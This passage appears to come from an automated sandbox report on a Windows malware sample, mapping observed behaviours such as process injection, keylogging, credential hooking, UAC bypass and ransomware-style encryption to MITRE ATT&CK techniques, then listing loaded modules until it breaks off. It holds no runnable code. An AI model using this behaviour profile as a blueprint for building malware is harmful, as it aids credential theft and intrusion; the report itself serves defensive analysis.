{"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 2, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 18}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 3, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Domain Generation Algorithms", "attck_id": "T1568.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568/002", "informative_identifiers_count": 1, "parent": {"technique": "Dynamic Resolution", "attck_id": "T1568", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Internal Defacement", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Defacement", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491"}}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70440000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"KERNEL32\" at base 757e0000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ba50000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"USER32.DLL\" at base 76940000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"PSAPI\" at base 77060000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"SHCORE\" at base 0\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"USER32\" at base 76940000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"NTDLL\" at base 76e20000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"SHELL32\" at base 75bb0000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"SHLWAPI\" at base 752a0000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"IPHLPAPI\" at base 73090000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"RSTRTMGR\" at base 6c7a0000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"KERNEL32.DLL\" at base 757e0000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"OLE32.DLL\" at base 75460000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"CRYPTBASE.DLL\" at base 74c20000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73a70000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"ADVAPI32.DLL\" at base 76ac0000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"PROPSYS.DLL\" at base 73820000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"COMCTL32.DLL\" at base 73c20000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"OLEAUT32.DLL\" at base 76800000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"SHELL32.DLL\" at base 75bb0000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"CLBCATQ.DLL\" at base 759c0000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73820000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"NTMARTA.DLL\" at base 74190000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75300000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"PROFAPI.DLL\" at base 74d40000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75a60000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"SECUR32.DLL\" at base 74a60000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"RPCRT4.DLL\" at base 76a10000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74dd0000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71360000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module 